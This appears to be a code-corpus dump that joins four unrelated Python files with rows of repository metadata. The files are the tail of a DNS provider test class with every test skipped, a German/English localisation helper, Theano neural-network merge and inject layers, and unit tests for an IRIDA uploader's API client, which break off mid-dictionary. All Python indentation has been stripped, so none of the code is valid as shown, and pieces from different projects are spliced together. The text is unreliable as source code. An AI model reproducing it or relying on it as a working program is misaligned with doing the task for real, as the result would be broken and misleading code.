@pytest.mark.skip(reason="NONE")
def test_provider_authenticate_with_unmanaged_domain_should_fail(self):
super(HosteuropeProviderTests, self).test_provider_authenticate_with_unmanaged_domain_should_fail()
@_vcr_integration_test
@pytest.mark.skip(reason="NONE")
def test_provider_when_calling_create_record_for_A_with_valid_name_and_content(self):
super(HosteuropeProviderTests,
self).test_provider_when_calling_create_record_for_A_with_valid_name_and_content()
@_vcr_integration_test
@pytest.mark.skip(reason="NONE")
def test_provider_when_calling_create_record_for_CNAME_with_valid_name_and_content(self):
super(HosteuropeProviderTests,
self).test_provider_when_calling_create_record_for_CNAME_with_valid_name_and_content()
@_vcr_integration_test
@pytest.mark.skip(reason="NONE")
def test_provider_when_calling_create_record_for_TXT_with_valid_name_and_content(self):
super(HosteuropeProviderTests,
self).test_provider_when_calling_create_record_for_TXT_with_valid_name_and_content()
@_vcr_integration_test
@pytest.mark.skip(reason="NONE")
def test_provider_when_calling_create_record_for_TXT_with_full_name_and_content(self):
super(HosteuropeProviderTests,
self).test_provider_when_calling_create_record_for_TXT_with_full_name_and_content()
@_vcr_integration_test
@pytest.mark.skip(reason="NONE")
def test_provider_when_calling_create_record_for_TXT_with_fqdn_name_and_content(self):
super(HosteuropeProviderTests,
self).test_provider_when_calling_create_record_for_TXT_with_fqdn_name_and_content()
@_vcr_integration_test
@pytest.mark.skip(reason="NONE")
def test_provider_when_calling_list_records_with_no_arguments_should_list_all(self):
super(HosteuropeProviderTests, self).test_provider_when_calling_list_records_with_no_arguments_should_list_all()
@_vcr_integration_test
@pytest.mark.skip(reason="NONE")
def test_provider_when_calling_list_records_with_name_filter_should_return_record(self):
super(HosteuropeProviderTests,
self).test_provider_when_calling_list_records_with_name_filter_should_return_record()
@_vcr_integration_test
@pytest.mark.skip(reason="NONE")
def test_provider_when_calling_list_records_with_full_name_filter_should_return_record(self):
super(HosteuropeProviderTests,
self).test_provider_when_calling_list_records_with_full_name_filter_should_return_record()
@_vcr_integration_test
@pytest.mark.skip(reason="NONE")
def test_provider_when_calling_list_records_with_fqdn_name_filter_should_return_record(self):
super(HosteuropeProviderTests,
self).test_provider_when_calling_list_records_with_fqdn_name_filter_should_return_record()
@_vcr_integration_test
@pytest.mark.skip(reason="NONE")
def test_provider_when_calling_list_records_after_setting_ttl(self):
super(HosteuropeProviderTests, self).test_provider_when_calling_list_records_after_setting_ttl()
@_vcr_integration_test
@pytest.mark.skip(reason="NONE")
def test_provider_when_calling_list_records_should_return_empty_list_if_no_records_found(self):
super(HosteuropeProviderTests,
self).test_provider_when_calling_list_records_should_return_empty_list_if_no_records_found()
@_vcr_integration_test
@pytest.mark.skip(reason="NONE")
def test_provider_when_calling_list_records_with_arguments_should_filter_list(self):
super(HosteuropeProviderTests, self).test_provider_when_calling_list_records_with_arguments_should_filter_list()
@_vcr_integration_test
@pytest.mark.skip(reason="NONE")
def test_provider_when_calling_update_record_should_modify_record(self):
super(HosteuropeProviderTests, self).test_provider_when_calling_update_record_should_modify_record()
@_vcr_integration_test
@pytest.mark.skip(reason="NONE")
def test_provider_when_calling_update_record_should_modify_record_name_specified(self):
super(HosteuropeProviderTests,
self).test_provider_when_calling_update_record_should_modify_record_name_specified()
@_vcr_integration_test
@pytest.mark.skip(reason="NONE")
def test_provider_when_calling_update_record_with_full_name_should_modify_record(self):
super(HosteuropeProviderTests,
self).test_provider_when_calling_update_record_with_full_name_should_modify_record()
@_vcr_integration_test
@pytest.mark.skip(reason="NONE")
def test_provider_when_calling_update_record_with_fqdn_name_should_modify_record(self):
super(HosteuropeProviderTests,
self).test_provider_when_calling_update_record_with_fqdn_name_should_modify_record()
@_vcr_integration_test
@pytest.mark.skip(reason="NONE")
def test_provider_when_calling_delete_record_by_identifier_should_remove_record(self):
super(HosteuropeProviderTests,
self).test_provider_when_calling_delete_record_by_identifier_should_remove_record()
@_vcr_integration_test
@pytest.mark.skip(reason="NONE")
def test_provider_when_calling_delete_record_by_filter_should_remove_record(self):
super(HosteuropeProviderTests,
self).test_provider_when_calling_delete_record_by_filter_should_remove_record()
@_vcr_integration_test
@pytest.mark.skip(reason="NONE")
def test_provider_when_calling_delete_record_by_filter_with_full_name_should_remove_record(self):
super(HosteuropeProviderTests,
self).test_provider_when_calling_delete_record_by_filter_with_full_name_should_remove_record()
@_vcr_integration_test
@pytest.mark.skip(reason="NONE")
def test_provider_when_calling_delete_record_by_filter_with_fqdn_name_should_remove_record(self):
super(HosteuropeProviderTests,
self).test_provider_when_calling_delete_record_by_filter_with_fqdn_name_should_remove_record()
@_vcr_integration_test
@pytest.mark.skip(reason="NONE")
def test_provider_when_calling_create_record_with_duplicate_records_should_be_noop(self):
super(HosteuropeProviderTests,
self).test_provider_when_calling_create_record_with_duplicate_records_should_be_noop()
@_vcr_integration_test
@pytest.mark.skip(reason="NONE")
def test_provider_when_calling_create_record_multiple_times_should_create_record_set(self):
super(HosteuropeProviderTests,
self).test_provider_when_calling_create_record_multiple_times_should_create_record_set()
@_vcr_integration_test
@pytest.mark.skip(reason="NONE")
def test_provider_when_calling_list_records_with_invalid_filter_should_be_empty_list(self):
super(HosteuropeProviderTests,
self).test_provider_when_calling_list_records_with_invalid_filter_should_be_empty_list()
@_vcr_integration_test
@pytest.mark.skip(reason="NONE")
def test_provider_when_calling_list_records_should_handle_record_sets(self):
super(HosteuropeProviderTests, self).test_provider_when_calling_list_records_should_handle_record_sets()
@_vcr_integration_test
@pytest.mark.skip(reason="NONE")
def test_provider_when_calling_delete_record_with_record_set_name_remove_all(self):
super(HosteuropeProviderTests, self).test_provider_when_calling_delete_record_with_record_set_name_remove_all()
@_vcr_integration_test
@pytest.mark.skip(reason="NONE")
def test_provider_when_calling_delete_record_with_record_set_by_content_should_leave_others_untouched(self):
super(HosteuropeProviderTests,
self).test_provider_when_calling_delete_record_with_record_set_by_content_should_leave_others_untouched()
| 47.407216 | 120 | 0.79776 | 1,151 | 9,197 | 5.763684 | 0.099913 | 0.101296 | 0.125415 | 0.180283 | 0.894784 | 0.894784 | 0.894784 | 0.880314 | 0.867953 | 0.844438 | 0 | 0 | 0.135588 | 9,197 | 193 | 121 | 47.65285 | 0.834465 | 0.042296 | 0 | 0.527027 | 0 | 0 | 0.028113 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.216216 | false | 0.013514 | 0.02027 | 0.02027 | 0.283784 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
2f97122f6b116b156af1be4bfe324309a3fe57ea | 5,523 | py | Python | bin/lang.py | SeppPenner/RaspberryPiBackupClient | 0f37415626a5c45425058053fbb4715160074af1 | [
"MIT"
] | 2 | 2018-10-12T18:57:06.000Z | 2019-04-29T10:04:55.000Z | bin/lang.py | SeppPenner/RaspberryPiBackupClient | 0f37415626a5c45425058053fbb4715160074af1 | [
"MIT"
] | null | null | null | bin/lang.py | SeppPenner/RaspberryPiBackupClient | 0f37415626a5c45425058053fbb4715160074af1 | [
"MIT"
] | 1 | 2019-04-29T10:04:56.000Z | 2019-04-29T10:04:56.000Z | from multimethod import multimethod
class Lang:
def __init__(self, language):
self.language = language
self.german = {
'CompressingFile': 'Komprimiere {0} in {1}.zip',
'ReadingFile': 'Einlesen der Datei {0}.zip',
'UploadingFile': 'Hochladen der Datei {0}.zip auf den WebDav-Server.',
'RemovingFile': 'Entferne Datei {0}.zip'
}
english = {
'CompressingFile': 'Compressing {0} to {1}.zip',
'ReadingFile': 'Reading in file {0}.zip',
'UploadingFile': 'Uploading file {0}.zip to the web dav server.',
'RemovingFile': 'Removing file {0}.zip'
}
def setLanguage(self, language: str):
"Sets the language to the given value, currently valid: 'german' and 'english'"
self.language = language
@multimethod
def getString(self, key: str):
"Gets the text from the specified key in the specified language"
if self.language == 'german':
if key in self.german:
return self.german.get(key)
else:
raise ValueError('Der Key wurde nicht gefunden: ' + key)
elif self.language == 'english':
if key in self.english:
return self.english.get(key)
else:
raise ValueError('The key was not found: ' + key)
else:
raise ValueError('Wrong language specified.')
@multimethod
def getString(self, key: str, value: str):
"Gets the text from the specified key in the specified language"
if self.language == 'german':
if key in self.german:
return self.german.get(key).format(value)
else:
raise ValueError('Der Key wurde nicht gefunden: ' + key)
elif self.language == 'english':
if key in self.english:
return self.english.get(key).format(value)
else:
raise ValueError('The key was not found: ' + key)
else:
raise ValueError('Wrong language specified.')
@multimethod
def getString(self, key: str, value: str, value2: str):
"Gets the text from the specified key in the specified language"
if self.language == 'german':
if key in self.german:
return self.german.get(key).format(value, value2)
else:
raise ValueError('Der Key wurde nicht gefunden: ' + key)
elif self.language == 'english':
if key in self.english:
return self.english.get(key).format(value, value2)
else:
raise ValueError('The key was not found: ' + key)
else:
raise ValueError('Wrong language specified.')
@multimethod
def getString(self, key: str, value: str, value2: str, value3: str):
"Gets the text from the specified key in the specified language"
if self.language == 'german':
if key in self.german:
return self.german.get(key).format(value, value2, value3)
else:
raise ValueError('Der Key wurde nicht gefunden: ' + key)
elif self.language == 'english':
if key in self.english:
return self.english.get(key).format(value, value2, value3)
else:
raise ValueError('The key was not found: ' + key)
else:
raise ValueError('Wrong language specified.')
@multimethod
def getString(self, key: str, value: str, value2: str, value3: str, value4: str):
"Gets the text from the specified key in the specified language"
if self.language == 'german':
if key in self.german:
return self.german.get(key).format(value, value2, value3, value4)
else:
raise ValueError('Der Key wurde nicht gefunden: ' + key)
elif self.language == 'english':
if key in self.english:
return self.english.get(key).format(value, value2, value3, value4)
else:
raise ValueError('The key was not found: ' + key)
else:
raise ValueError('Wrong language specified.')
@multimethod
def getString(self, key: str, value: str, value2: str, value3: str, value4: str, value5: str):
"Gets the text from the specified key in the specified language"
if self.language == 'german':
if key in self.german:
return self.german.get(key).format(value, value2, value3, value4, value5)
else:
raise ValueError('Der Key wurde nicht gefunden: ' + key)
elif self.language == 'english':
if key in self.english:
return self.english.get(key).format(value, value2, value3, value4, value5)
else:
raise ValueError('The key was not found: ' + key)
else:
raise ValueError('Wrong language specified.')
@multimethod
def getString(self, key: str, value: str, value2: str, value3: str, value4: str, value5: str, value6: str):
"Gets the text from the specified key in the specified language"
if self.language == 'german':
if key in self.german:
return self.german.get(key).format(value, value2, value3, value4, value5, value6)
else:
raise ValueError('Der Key wurde nicht gefunden: ' + key)
elif self.language == 'english':
if key in self.english:
return self.english.get(key).format(value, value2, value3, value4, value5, value6)
else:
raise ValueError('The key was not found: ' + key)
else:
raise ValueError('Wrong language specified.')
@multimethod
def getString(self, key: str, value: str, value2: str, value3: str, value4: str, value5: str, value6: str, value7: str):
"Gets the text from the specified key in the specified language"
if self.language == 'german':
if key in self.german:
return self.german.get(key).format(value, value2, value3, value4, value5, value6, value7)
else:
raise ValueError('Der Key wurde nicht gefunden: ' + key)
elif self.language == 'english':
if key in self.english:
return self.english.get(key).format(value, value2, value3, value4, value5, value6, value7)
else:
raise ValueError('The key was not found: ' + key)
else:
raise ValueError('Wrong language specified.') | 37.067114 | 121 | 0.690567 | 768 | 5,523 | 4.960938 | 0.09375 | 0.031496 | 0.119685 | 0.046194 | 0.870604 | 0.870604 | 0.86273 | 0.86273 | 0.86273 | 0.86273 | 0 | 0.016309 | 0.189571 | 5,523 | 149 | 122 | 37.067114 | 0.834897 | 0.105196 | 0 | 0.705036 | 0 | 0 | 0.297248 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071942 | false | 0 | 0.007194 | 0 | 0.201439 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
85e440ad4439153f0b850eecbe84109454ef0077 | 12,340 | py | Python | experiments/where_image/architecture/joiners.py | mtanti/where-image | 3e232f2eb29c12e0d8ec322cdff656d68b753d19 | [
"MIT"
] | 3 | 2017-04-05T12:20:49.000Z | 2020-12-06T07:11:14.000Z | experiments/where_image/architecture/joiners.py | mtanti/where-image | 3e232f2eb29c12e0d8ec322cdff656d68b753d19 | [
"MIT"
] | null | null | null | experiments/where_image/architecture/joiners.py | mtanti/where-image | 3e232f2eb29c12e0d8ec322cdff656d68b753d19 | [
"MIT"
] | null | null | null | from __future__ import absolute_import, division, print_function, unicode_literals
from builtins import ascii, bytes, chr, dict, filter, hex, input, int, map, next, oct, open, pow, range, round, str, super, zip
import theano
import theano.tensor as T
import math
import numpy as np
from architecture.layer import *
floatX = theano.config.floatX
##################################################################################################################################
class MergeAdd(Layer):
#################################################################
def __init__(self, name, in_layer1, in_layer2):
super(MergeAdd, self).__init__(
name,
children=[in_layer1, in_layer2],
dependents=[in_layer1.name, in_layer2.name]
)
#################################################################
def compile_params(self, dependent_sizes):
[ input1_size, input2_size ] = dependent_sizes
if input1_size != input2_size:
raise ValueError('Layers must have the same output size in order to be merged additively.')
return input1_size
#################################################################
def _get_model(self, dependent_models):
[ in_model1, in_model2 ] = dependent_models
return in_model1 + in_model2
#################################################################
def get_training_model(self, dependent_models):
return self._get_model(dependent_models)
#################################################################
def get_testing_model(self, dependent_models):
return self._get_model(dependent_models)
##################################################################################################################################
class MergeMult(Layer):
#################################################################
def __init__(self, name, in_layer1, in_layer2):
super(MergeMult, self).__init__(
name,
children=[in_layer1, in_layer2],
dependents=[in_layer1.name, in_layer2.name]
)
#################################################################
def compile_params(self, dependent_sizes):
[ input1_size, input2_size ] = dependent_sizes
if input1_size != input2_size:
raise ValueError('Layers must have the same output size in order to be merged multiplicatively.')
return input1_size
#################################################################
def _get_model(self, dependent_models):
[ in_model1, in_model2 ] = dependent_models
return in_model1 * in_model2
#################################################################
def get_training_model(self, dependent_models):
return self._get_model(dependent_models)
#################################################################
def get_testing_model(self, dependent_models):
return self._get_model(dependent_models)
##################################################################################################################################
class MergeConcat(Layer):
#################################################################
def __init__(self, name, in_layer1, in_layer2):
super(MergeConcat, self).__init__(
name,
children=[in_layer1, in_layer2],
dependents=[in_layer1.name, in_layer2.name]
)
#################################################################
def compile_params(self, dependent_sizes):
[ input1_size, input2_size ] = dependent_sizes
return input1_size + input2_size
#################################################################
def _get_model(self, dependent_models):
[ in_model1, in_model2 ] = dependent_models
return T.concatenate([in_model1, in_model2], axis=1)
#################################################################
def get_training_model(self, dependent_models):
return self._get_model(dependent_models)
#################################################################
def get_testing_model(self, dependent_models):
return self._get_model(dependent_models)
##################################################################################################################################
class ParInjectSeq(Layer):
#################################################################
def __init__(self, name, new_items, in_layer):
super(ParInjectSeq, self).__init__(
name,
children=[new_items, in_layer],
dependents=[new_items.name, in_layer.name]
)
#################################################################
def compile_params(self, dependent_sizes):
[ new_item_size, in_size ] = dependent_sizes
if new_item_size != in_size:
raise ValueError('Layers must have the same output size in order to be merged in parallel.')
return in_size
#################################################################
def _get_model(self, dependent_models):
[ new_items, in_model ] = dependent_models
vectors_to_join = T.extra_ops.repeat(new_items.dimshuffle(0,'x',1), in_model.shape[1], axis=1)
return vectors_to_join + in_model
#################################################################
def get_training_model(self, dependent_models):
return self._get_model(dependent_models)
#################################################################
def get_testing_model(self, dependent_models):
return self._get_model(dependent_models)
##################################################################################################################################
class PreInjectSeq(Layer):
#################################################################
def __init__(self, name, new_items, in_layer):
super(PreInjectSeq, self).__init__(
name,
children=[new_items, in_layer],
dependents=[new_items.name, in_layer.name]
)
#################################################################
def compile_params(self, dependent_sizes):
[ new_item_size, in_size ] = dependent_sizes
return in_size
#################################################################
def _get_model(self, dependent_models):
[ new_items, in_model ] = dependent_models
return T.concatenate([ new_items.dimshuffle(0,'x',1), in_model ], axis=1)
#################################################################
def get_training_model(self, dependent_models):
return self._get_model(dependent_models)
#################################################################
def get_testing_model(self, dependent_models):
return self._get_model(dependent_models)
##################################################################################################################################
class PreInjectMask(Layer):
#################################################################
def __init__(self, name, value, mask_layer):
super(PreInjectMask, self).__init__(
name,
children=[mask_layer],
dependents=[mask_layer.name]
)
self.value = value
#################################################################
def compile_params(self, dependent_sizes):
[ mask_size ] = dependent_sizes
return mask_size
#################################################################
def _get_model(self, dependent_models):
[ mask ] = dependent_models
return T.concatenate([ self.value*T.ones((mask.shape[0], 1), 'int16'), mask ], axis=1)
#################################################################
def get_training_model(self, dependent_models):
return self._get_model(dependent_models)
#################################################################
def get_testing_model(self, dependent_models):
return self._get_model(dependent_models)
##################################################################################################################################
class PostInjectSeq(Layer):
#################################################################
def __init__(self, name, new_items, in_layer):
super(PostInjectSeq, self).__init__(
name,
children=[new_items, in_layer],
dependents=[new_items.name, in_layer.name]
)
#################################################################
def compile_params(self, dependent_sizes):
[ new_item_size, in_size ] = dependent_sizes
return in_size
#################################################################
def _get_model(self, dependent_models):
[ new_items, in_model ] = dependent_models
return T.concatenate([ in_model, new_items.dimshuffle(0,'x',1) ], axis=1)
#################################################################
def get_training_model(self, dependent_models):
return self._get_model(dependent_models)
#################################################################
def get_testing_model(self, dependent_models):
return self._get_model(dependent_models)
##################################################################################################################################
class PostInjectMask(Layer):
#################################################################
def __init__(self, name, value, mask_layer):
super(PostInjectMask, self).__init__(
name,
children=[mask_layer],
dependents=[mask_layer.name]
)
self.value = value
#################################################################
def compile_params(self, dependent_sizes):
[ mask_size ] = dependent_sizes
return mask_size
#################################################################
def _get_model(self, dependent_models):
[ mask ] = dependent_models
return T.concatenate([ mask, self.value*T.ones((mask.shape[0], 1), 'int16') ], axis=1)
#################################################################
def get_training_model(self, dependent_models):
return self._get_model(dependent_models)
#################################################################
def get_testing_model(self, dependent_models):
return self._get_model(dependent_models)
| 43.914591 | 131 | 0.371637 | 851 | 12,340 | 5.003525 | 0.125734 | 0.169093 | 0.101456 | 0.135275 | 0.85768 | 0.854627 | 0.845937 | 0.845937 | 0.832785 | 0.800376 | 0 | 0.007361 | 0.284441 | 12,340 | 280 | 132 | 44.071429 | 0.474858 | 0 | 0 | 0.699346 | 0 | 0 | 0.027672 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.261438 | false | 0 | 0.045752 | 0.104575 | 0.568627 | 0.006536 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 10 |
c08eed5f645b0b8040466e7552a683261ce51fa2 | 37,558 | py | Python | Tests/unitTests/test_ApiCalls.py | phac-nml/irida-miseq-uploader | ca3625f154158c6496b0644931cd5622e58f3891 | [
"Apache-2.0"
] | 9 | 2015-11-24T21:51:42.000Z | 2020-10-21T20:16:24.000Z | Tests/unitTests/test_ApiCalls.py | phac-nml/irida-miseq-uploader | ca3625f154158c6496b0644931cd5622e58f3891 | [
"Apache-2.0"
] | 6 | 2016-09-13T20:38:57.000Z | 2019-02-21T18:31:22.000Z | Tests/unitTests/test_ApiCalls.py | phac-nml/irida-miseq-uploader | ca3625f154158c6496b0644931cd5622e58f3891 | [
"Apache-2.0"
] | 1 | 2018-10-07T00:55:43.000Z | 2018-10-07T00:55:43.000Z | import unittest
import json
import httplib
from urllib2 import URLError
from mock import patch, MagicMock
from requests.exceptions import HTTPError as request_HTTPError
from Model.SequenceFile import SequenceFile
from Model.SequencingRun import SequencingRun
import API
class Foo(object):
"""
Class used to attach attributes
"""
def __init__(self):
pass
class TestApiCalls(unittest.TestCase):
def setUp(self):
print "\nStarting " + self.__module__ + ": " + self._testMethodName
print "\nResetting api"
# Sets api params to "reset" so a new instance is created when the test
# initializes the api with the parameters it needs for the test
API.apiCalls.ApiCalls.close()
@patch("API.apiCalls.urlopen")
@patch("API.apiCalls.ApiCalls.create_session")
def test_validate_URL_existence_url_ok(self, mock_cs, mock_url):
url_ok = Foo()
setattr(url_ok, "code", httplib.OK)
mock_url.side_effect = [url_ok]
mock_cs.side_effect = [None]
api = API.apiCalls.ApiCalls("", "", "", "", "")
validate_URL = api.validate_URL_existence
url = "http://google.com"
valid = True
is_valid = validate_URL(url)
self.assertEqual(is_valid, valid)
API.apiCalls.urlopen.assert_called_with(url, timeout=api.max_wait_time)
@patch("API.apiCalls.urlopen")
@patch("API.apiCalls.ApiCalls.create_session")
def test_validate_URL_existence_url_raise_err(self, mock_cs, mock_url):
url_raise_err = Foo()
err_msg = "Unauthorized"
setattr(url_raise_err, "code", httplib.UNAUTHORIZED)
setattr(url_raise_err, "msg", err_msg)
mock_url.side_effect = [url_raise_err]
mock_cs.side_effect = [None]
api = API.apiCalls.ApiCalls(
client_id="",
client_secret="",
base_URL="",
username="",
password=""
)
validate_URL = api.validate_URL_existence
url = "http://localhost:8080/api/"
with self.assertRaises(Exception) as err:
validate_URL(url)
self.assertTrue(err_msg in str(err.exception))
API.apiCalls.urlopen.assert_called_with(url, timeout=api.max_wait_time)
@patch("API.apiCalls.urlopen")
@patch("API.apiCalls.ApiCalls.create_session")
def test_validate_URL_existence_url_not_found(self, mock_cs, mock_url):
url_not_found = Foo()
setattr(url_not_found, "code", httplib.NOT_FOUND)
mock_url.side_effect = [url_not_found]
mock_cs.side_effect = [None]
api = API.apiCalls.ApiCalls("", "", "", "", "")
validate_URL = api.validate_URL_existence
url = "notAWebSite"
valid = False
is_valid = validate_URL(url)
self.assertEqual(is_valid, valid)
API.apiCalls.urlopen.assert_called_with(url, timeout=api.max_wait_time)
@patch("API.apiCalls.ApiCalls.add_timeout_backoff")
@patch("API.apiCalls.ApiCalls.validate_URL_existence")
@patch("API.apiCalls.ApiCalls.get_access_token")
@patch("API.apiCalls.ApiCalls.get_oauth_service")
@patch("API.apiCalls.validate_URL_form")
def test_create_session_valid_base_url_no_slash(
self, mock_validate_url_form,
mock_get_oauth_service, mock_get_access_token,
mock_validate_url_existence, mock_add_timeout_backoff):
oauth_service = Foo()
access_token = Foo()
setattr(oauth_service, "get_session", lambda x: "newSession1")
mock_validate_url_form.side_effect = [True]
mock_get_oauth_service.side_effect = [oauth_service]
mock_get_access_token.side_effect = [access_token]
mock_validate_url_existence.side_effect = [True]
base_URL1 = "http://localhost:8082"
api1 = API.apiCalls.ApiCalls(
client_id="",
client_secret="",
base_URL=base_URL1,
username="",
password=""
)
mock_validate_url_existence.assert_called_with(
base_URL1 + "/", use_session=True)
@patch("API.apiCalls.ApiCalls.add_timeout_backoff")
@patch("API.apiCalls.ApiCalls.validate_URL_existence")
@patch("API.apiCalls.ApiCalls.get_access_token")
@patch("API.apiCalls.ApiCalls.get_oauth_service")
@patch("API.apiCalls.validate_URL_form")
def test_create_session_valid_base_url_slash(
self, mock_validate_url_form,
mock_get_oauth_service, mock_get_access_token,
mock_validate_url_existence, mock_add_timeout_backoff):
oauth_service = Foo()
access_token = Foo()
setattr(oauth_service, "get_session", lambda x: "newSession2")
mock_validate_url_form.side_effect = [True]
mock_get_oauth_service.side_effect = [oauth_service]
mock_get_access_token.side_effect = [access_token]
mock_validate_url_existence.side_effect = [True]
base_URL2 = "http://localhost:8080/"
api2 = API.apiCalls.ApiCalls(
client_id="",
client_secret="",
base_URL=base_URL2,
username="",
password=""
)
mock_validate_url_existence.assert_called_with(
base_URL2, use_session=True)
# This test validates that the api is a singleton, and does not make extra requests when re-init with same params
@patch("API.apiCalls.ApiCalls.add_timeout_backoff")
@patch("API.apiCalls.ApiCalls.validate_URL_existence")
@patch("API.apiCalls.ApiCalls.get_access_token")
@patch("API.apiCalls.ApiCalls.get_oauth_service")
@patch("API.apiCalls.validate_URL_form")
def test_create_session_back_to_back(
self, mock_validate_url_form,
mock_get_oauth_service, mock_get_access_token,
mock_validate_url_existence,
mock_add_timeout_backoff):
oauth_service = Foo()
access_token = Foo()
setattr(oauth_service, "get_session", lambda x: "newSession3")
mock_validate_url_form.side_effect = [True]
mock_get_oauth_service.side_effect = [oauth_service]
mock_get_access_token.side_effect = [access_token]
mock_validate_url_existence.side_effect = [True]
base_URL3 = "http://localhost:8083/"
api3 = API.apiCalls.ApiCalls(
client_id="",
client_secret="",
base_URL=base_URL3,
username="",
password=""
)
mock_validate_url_existence.assert_called_with(
base_URL3, use_session=True)
api4 = API.apiCalls.ApiCalls(
client_id="",
client_secret="",
base_URL=base_URL3,
username="",
password=""
)
# Should only call the server once, when having the same parameters
mock_validate_url_existence.assert_called_once_with(
base_URL3, use_session=True)
# Should have the same API
self.assertTrue(api3 is api4)
@patch("API.apiCalls.validate_URL_form")
def test_create_session_invalid_form(self, mock_validate_url_form):
mock_validate_url_form.side_effect = [False]
base_URL = "invalidForm.com/"
with self.assertRaises(URLError) as err:
API.apiCalls.ApiCalls(
client_id="",
client_secret="",
base_URL=base_URL,
username="",
password=""
)
self.assertTrue("not a valid URL" in str(err.exception))
mock_validate_url_form.assert_called_with(base_URL)
@patch("API.apiCalls.ApiCalls.add_timeout_backoff")
@patch("API.apiCalls.ApiCalls.validate_URL_existence")
@patch("API.apiCalls.ApiCalls.get_access_token")
@patch("API.apiCalls.ApiCalls.get_oauth_service")
@patch("API.apiCalls.validate_URL_form")
def test_create_session_invalid_session(self, mock_validate_url_form,
mock_get_oauth_service,
mock_get_access_token,
mock_validate_url_existence,
mock_add_timeout_backoff):
oauth_service = Foo()
access_token = Foo()
setattr(oauth_service, "get_session", lambda x: "newSession")
mock_validate_url_form.side_effect = [True]
mock_get_oauth_service.side_effect = [oauth_service]
mock_get_access_token.side_effect = [access_token]
mock_validate_url_existence.side_effect = [False]
with self.assertRaises(Exception) as err:
API.apiCalls.ApiCalls(
client_id="",
client_secret="",
base_URL="",
username="",
password=""
)
expectedErrMsg = "Cannot create session. Verify your credentials " + \
"are correct."
self.assertTrue(expectedErrMsg in str(err.exception))
mock_validate_url_form.assert_called_with("/")
@patch("API.apiCalls.ApiCalls.create_session")
@patch("API.apiCalls.ApiCalls.validate_URL_existence")
def test_get_link_valid(self,
mock_validate_url_existence,
mock_cs):
mock_validate_url_existence.side_effect = [True]
mock_cs.side_effect = [None]
api = API.apiCalls.ApiCalls(
client_id="",
client_secret="",
base_URL="",
username="",
password=""
)
targ_URL = "http://localhost:8080/api/"
targ_key = "project"
targ_link = "http://localhost:8080/api/project"
json_obj = {
"resource": {
"links": [
{
"rel": targ_key,
"href": targ_link
}
]
}
}
session_response = Foo()
setattr(session_response, "json", lambda: json_obj)
session_get = MagicMock(side_effect=[session_response])
session = Foo()
setattr(session, "get", session_get)
api.session = session
link = api.get_link(targ_URL, targ_key)
api.session.get.assert_called_with(targ_URL)
self.assertEqual(link, targ_link)
@patch("API.apiCalls.ApiCalls.create_session")
@patch("API.apiCalls.ApiCalls.validate_URL_existence")
def test_get_link_valid_targ_dict(self,
mock_validate_url_existence,
mock_cs):
mock_validate_url_existence.side_effect = [True]
mock_cs.side_effect = [None]
api = API.apiCalls.ApiCalls(
client_id="",
client_secret="",
base_URL="",
username="",
password=""
)
targ_URL = "http://localhost:8080/api/"
targ_key = "project"
targ_link = "http://localhost:8080/api/project"
json_obj = {
"resource": {
"resources": [{
"identifier": "1",
"links": [
{
"rel": targ_key,
"href": targ_link
}
]
}]
}
}
session_response = Foo()
setattr(session_response, "json", lambda: json_obj)
session_get = MagicMock(side_effect=[session_response])
session = Foo()
setattr(session, "get", session_get)
api.session = session
t_dict = {"key": "identifier", "value": "1"}
link = api.get_link(targ_URL, targ_key, targ_dict=t_dict)
api.session.get.assert_called_with(targ_URL)
self.assertEqual(link, targ_link)
@patch("API.apiCalls.ApiCalls.create_session")
@patch("API.apiCalls.ApiCalls.validate_URL_existence")
def test_get_link_invalid_url_not_found(self,
mock_validate_url_existence,
mock_cs):
mock_validate_url_existence.side_effect = [False]
mock_cs.side_effect = [None]
api = API.apiCalls.ApiCalls(
client_id="",
client_secret="",
base_URL="",
username="",
password=""
)
targ_URL = "http://localhost:8080/api/"
targ_key = "project"
with self.assertRaises(request_HTTPError) as err:
api.get_link(targ_URL, targ_key)
self.assertTrue("not a valid URL" in str(err.exception))
mock_validate_url_existence.assert_called_with(targ_URL,
use_session=True)
@patch("API.apiCalls.ApiCalls.create_session")
@patch("API.apiCalls.ApiCalls.validate_URL_existence")
def test_get_link_invalid_key_not_found(self,
mock_validate_url_existence,
mock_cs):
mock_validate_url_existence.side_effect = [True]
mock_cs.side_effect = [None]
api = API.apiCalls.ApiCalls(
client_id="",
client_secret="",
base_URL="",
username="",
password=""
)
targ_URL = "http://localhost:8080/api/"
targ_key = "project"
targ_link = "http://localhost:8080/api/project"
invalid_key = "notProject"
json_obj = {
"resource": {
"links": [
{
"rel": invalid_key,
"href": targ_link
}
]
}
}
session_response = Foo()
setattr(session_response, "json", lambda: json_obj)
session_get = MagicMock(side_effect=[session_response])
session = Foo()
setattr(session, "get", session_get)
api.session = session
with self.assertRaises(KeyError) as err:
api.get_link(targ_URL, targ_key)
self.assertTrue(targ_key + " not found in links" in str(err.exception))
self.assertTrue(
"Available links: " + invalid_key in str(err.exception))
api.session.get.assert_called_with(targ_URL)
@patch("API.apiCalls.ApiCalls.create_session")
@patch("API.apiCalls.ApiCalls.validate_URL_existence")
def test_get_link_invalid_targ_dict_value(self,
mock_validate_url_existence,
mock_cs):
mock_validate_url_existence.side_effect = [True]
mock_cs.side_effect = [None]
api = API.apiCalls.ApiCalls(
client_id="",
client_secret="",
base_URL="",
username="",
password=""
)
targ_URL = "http://localhost:8080/api/"
targ_key = "project"
targ_link = "http://localhost:8080/api/project"
json_obj = {
"resource": {
